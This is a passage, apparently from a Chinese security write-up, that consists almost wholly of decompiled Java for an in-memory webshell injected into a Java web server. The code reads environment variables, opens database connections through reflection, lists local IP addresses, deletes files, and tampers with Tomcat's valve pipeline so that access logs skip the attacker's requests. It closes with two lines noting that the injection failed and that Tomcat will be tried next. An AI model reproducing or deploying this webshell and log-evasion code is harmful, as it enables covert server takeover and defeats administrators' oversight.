((InputStream)var9).close(); return var10 == var8.length ? var8 : copyOf(var8, var10); } else { return "no mode".getBytes(); } } catch (Exception var11) { StringBuffer var7 = new StringBuffer(); var7.append("Exception errMsg:"); var7.append(var11.getMessage()); return var7.toString().getBytes(); } } public static byte[] copyOf(byte[] var0, int var1) { byte[] var2 = new byte[var1]; System.arraycopy(var0, 0, var2, 0, Math.min(var0.length, var1)); return var2; } public Map getEnv() { try { Class var10000 = class$9; if (var10000 == null) { try { var10000 = Class.forName("java.lang.System"); } catch (ClassNotFoundException var1) { throw new NoClassDefFoundError(var1.getMessage()); } class$9 = var10000; } return (Map)var10000.getMethod("getenv").invoke((Object)null); } catch (Throwable var2) { return null; } } public static Connection getConnection(String var0, String var1, String var2) { Connection var3 = null; try { Class var10000 = class$10; if (var10000 == null) { try { var10000 = Class.forName("java.sql.DriverManager"); } catch (ClassNotFoundException var15) { throw new NoClassDefFoundError(var15.getMessage()); } class$10 = var10000; } Field[] var4 = var10000.getDeclaredFields(); Field var5 = null; for(int var6 = 0; var6 < var4.length; ++var6) { var5 = var4[var6]; if (var5.getName().indexOf("rivers") != -1) { var10000 = class$11; if (var10000 == null) { try { var10000 = Class.forName("java.util.List"); } catch (ClassNotFoundException var14) { throw new NoClassDefFoundError(var14.getMessage()); } class$11 = var10000; } if (var10000.isAssignableFrom(var5.getType())) { break; } } var5 = null; } if (var5 != null) { var5.setAccessible(true); List var18 = (List)var5.get((Object)null); Iterator var7 = var18.iterator(); while(var7.hasNext() && var3 == null) { try { Object var8 = var7.next(); Driver var9 = null; var10000 = class$12; if (var10000 == null) { try { var10000 = Class.forName("java.sql.Driver"); } catch (ClassNotFoundException var13) { throw new NoClassDefFoundError(var13.getMessage()); } class$12 = var10000; } if (!var10000.isAssignableFrom(var8.getClass())) { Field[] var10 = var8.getClass().getDeclaredFields(); for(int var11 = 0; var11 < var10.length; ++var11) { var10000 = class$12; if (var10000 == null) { try { var10000 = Class.forName("java.sql.Driver"); } catch (ClassNotFoundException var12) { throw new NoClassDefFoundError(var12.getMessage()); } class$12 = var10000; } if (var10000.isAssignableFrom(var10[var11].getType())) { var10[var11].setAccessible(true); var9 = (Driver)var10[var11].get(var8); break; } } } if (var9 != null) { Properties var19 = new Properties(); if (var1 != null) { var19.put("user", var1); } if (var2 != null) { var19.put("password", var2); } var3 = var9.connect(var0, var19); } } catch (Exception var16) { } } } } catch (Exception var17) { } return var3; } public String sessionId() { byte[] var1 = this.getByteArray("sessionId"); return var1 != null ? new String(var1) : null; } public static String getLocalIPList() { ArrayList var0 = new ArrayList(); try { Class var1 = Class.forName("java.net.NetworkInterface"); Method var2 = var1.getMethod("getNetworkInterfaces"); Method var3 = var1.getMethod("getInetAddresses"); Enumeration var4 = (Enumeration)var2.invoke((Object)null); while(var4.hasMoreElements()) { Object var5 = var4.nextElement(); Enumeration var6 = (Enumeration)var3.invoke(var5); while(var6.hasMoreElements()) { InetAddress var7 = (InetAddress)var6.nextElement(); if (var7 != null) { String var8 = var7.getHostAddress(); var0.add(var8); } } } } catch (Throwable var9) { } Iterator var10 = var0.iterator(); StringBuffer var11 = new StringBuffer(); var11.append("["); while(var10.hasNext()) { Object var12 = var10.next(); var11.append(var12.toString()); var11.append(","); } if (var11.length() > 1) { var11.deleteCharAt(var11.length() - 1); } var11.append("]"); return var11.toString(); } public String getRealPath() { String var1 = (new File("")).getAbsoluteFile() + "/"; if (this.servletRequest != null) { try { Method var2 = this.getMethodByClass(this.servletRequest.getClass(), "getServletContext", new Class[0]); Object var3 = var2.invoke(this.servletRequest, (Object[])null); if (var3 != null) { Class var4 = var3.getClass(); Class[] var5 = new Class[1]; Class var10002 = class$3; if (var10002 == null) { try { var10002 = Class.forName("java.lang.String"); } catch (ClassNotFoundException var8) { throw new NoClassDefFoundError(var8.getMessage()); } class$3 = var10002; } var5[0] = var10002; Method var6 = this.getMethodByClass(var4, "getRealPath", var5); if (var6 != null) { Object var7 = var6.invoke(var3, "/"); return var7 != null ? var7.toString() : var1; } } } catch (Throwable var9) { } } return var1; } public void deleteFiles(File var1) throws Exception { if (var1.isDirectory()) { File[] var2 = var1.listFiles(); for(int var3 = 0; var3 < var2.length; ++var3) { File var4 = var2[var3]; this.deleteFiles(var4); } } var1.delete(); } Object invoke(Object var1, String var2, Object[] var3) { try { ArrayList var4 = new ArrayList(); if (var3 != null) { for(int var5 = 0; var5 < var3.length; ++var5) { Object var6 = var3[var5]; if (var6 != null) { var4.add(var6.getClass()); } else { var4.add((Object)null); } } } Method var8 = this.getMethodByClass(var1.getClass(), var2, (Class[])var4.toArray(new Class[0])); return var8.invoke(var1, var3); } catch (Exception var7) { return null; } } Method getMethodByClass(Class var1, String var2, Class[] var3) { Method var4 = null; while(var1 != null) { try { var4 = var1.getDeclaredMethod(var2, var3); var1 = null; } catch (Exception var5) { var1 = var1.getSuperclass(); } } return var4; } public static Object getFieldValue(Object var0, String var1) throws Exception { Field var2 = null; if (var0 instanceof Field) { var2 = (Field)var0; } else { Class var3 = var0.getClass(); while(var3 != null) { try { var2 = var3.getDeclaredField(var1); var3 = null; } catch (Exception var4) { var3 = var3.getSuperclass(); } } } var2.setAccessible(true); return var2.get(var0); } private byte[] readInputStream(InputStream var1, int var2) { byte[] var3 = new byte[var2]; int var4 = 0; try { while((var4 += var1.read(var3, var4, var3.length - var4)) < var3.length) { } } catch (IOException var5) { } return var3; } public static String getRandomString(int var0) { String var1 = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; Random var2 = new Random(); StringBuffer var3 = new StringBuffer(); var3.append(var1.charAt(var2.nextInt(52))); var1 = var1 + "0123456789"; for(int var4 = 0; var4 < var0; ++var4) { int var5 = var2.nextInt(62); var3.append(var1.charAt(var5)); } return var3.toString(); } private void noLog(Object var1) { try { Method var2 = this.getMethodByClass(var1.getClass(), "getServletContext", (Class[])null); Object var3 = var2.invoke(var1, (Object[])null); Object var4 = getFieldValue(var3, "context"); Object var5 = getFieldValue(var4, "context"); ArrayList var6; for(var6 = new ArrayList(); var5 != null; var5 = this.invoke(var5, "getParent", (Object[])null)) { var6.add(var5); } label84: for(int var7 = 0; var7 < var6.size(); ++var7) { try { Object var8 = this.invoke(var6.get(var7), "getPipeline", (Object[])null); if (var8 != null) { Object var9 = this.invoke(var8, "getFirst", (Object[])null); while(true) { while(true) { if (var9 == null) { continue label84; } if (this.getMethodByClass(var9.getClass(), "getCondition", (Class[])null) != null) { Class var10001 = var9.getClass(); Class[] var10003 = new Class[1]; Class var10006 = class$3; if (var10006 == null) { try { var10006 = Class.forName("java.lang.String"); } catch (ClassNotFoundException var14) { throw new NoClassDefFoundError(var14.getMessage()); } class$3 = var10006; } var10003[0] = var10006; if (this.getMethodByClass(var10001, "setCondition", var10003) != null) { String var10 = (String)this.invoke((String)var9, "getCondition", new Object[0]); var10 = var10 == null ? "FuckLog" : var10; this.invoke(var9, "setCondition", new Object[]{var10}); var10001 = var1.getClass(); var10003 = new Class[2]; var10006 = class$3; if (var10006 == null) { try { var10006 = Class.forName("java.lang.String"); } catch (ClassNotFoundException var13) { throw new NoClassDefFoundError(var13.getMessage()); } class$3 = var10006; } var10003[0] = var10006; var10006 = class$3; if (var10006 == null) { try { var10006 = Class.forName("java.lang.String"); } catch (ClassNotFoundException var12) { throw new NoClassDefFoundError(var12.getMessage()); } class$3 = var10006; } var10003[1] = var10006; Method var11 = this.getMethodByClass(var10001, "setAttribute", var10003); var11.invoke(var10, var10); var9 = this.invoke(var9, "getNext", (Object[])null); continue; } } if (Class.forName("org.apache.catalina.Valve", false, var4.getClass().getClassLoader()).isAssignableFrom(var9.getClass())) { var9 = this.invoke(var9, "getNext", (Object[])null); } else { var9 = null; } } } } } catch (Exception var15) { } } } catch (Exception var16) { } } public static int bytesToInt(byte[] var0) { int var1 = var0[0] & 255 | (var0[1] & 255) << 8 | (var0[2] & 255) << 16 | (var0[3] & 255) << 24; return var1; } public static byte[] intToBytes(int var0) { byte[] var1 = new byte[]{(byte)(var0 & 255), (byte)(var0 >> 8 & 255), (byte)(var0 >> 16 & 255), (byte)(var0 >> 24 & 255)}; return var1; } public String base64Encode(byte[] var1) { byte var2 = 0; int var3 = var1.length; byte[] var4 = new byte[4 * ((var1.length + 2) / 3)]; byte var5 = -1; boolean var6 = true; char[] var7 = toBase64; int var8 = var2; int var9 = (var3 - var2) / 3 * 3; int var10 = var2 + var9; if (var5 > 0 && var9 > var5 / 4 * 3) { var9 = var5 / 4 * 3; } int var11; int var12; int var13; for(var11 = 0; var8 < var10; var8 = var12) { var12 = Math.min(var8 + var9, var10); var13 = var8; int var15; for(int var14 = var11; var13 < var12; var4[var14++] = (byte)var7[var15 & 63]) { var15 = (var1[var13++] & 255) << 16 | (var1[var13++] & 255) << 8 | var1[var13++] & 255; var4[var14++] = (byte)var7[var15 >>> 18 & 63]; var4[var14++] = (byte)var7[var15 >>> 12 & 63]; var4[var14++] = (byte)var7[var15 >>> 6 & 63]; } var13 = (var12 - var8) / 3 * 4; var11 += var13; } if (var8 < var3) { var12 = var1[var8++] & 255; var4[var11++] = (byte)var7[var12 >> 2]; if (var8 == var3) { var4[var11++] = (byte)var7[var12 << 4 & 63]; if (var6) { var4[var11++] = 61; var4[var11++] = 61; } } else { var13 = var1[var8++] & 255; var4[var11++] = (byte)var7[var12 << 4 & 63 | var13 >> 4]; var4[var11++] = (byte)var7[var13 << 2 & 63]; if (var6) { var4[var11++] = 61; } } } return new String(var4); } }
我们将如上内存马打进去,并没有任何反应,
我们尝试切换tomcat进行解析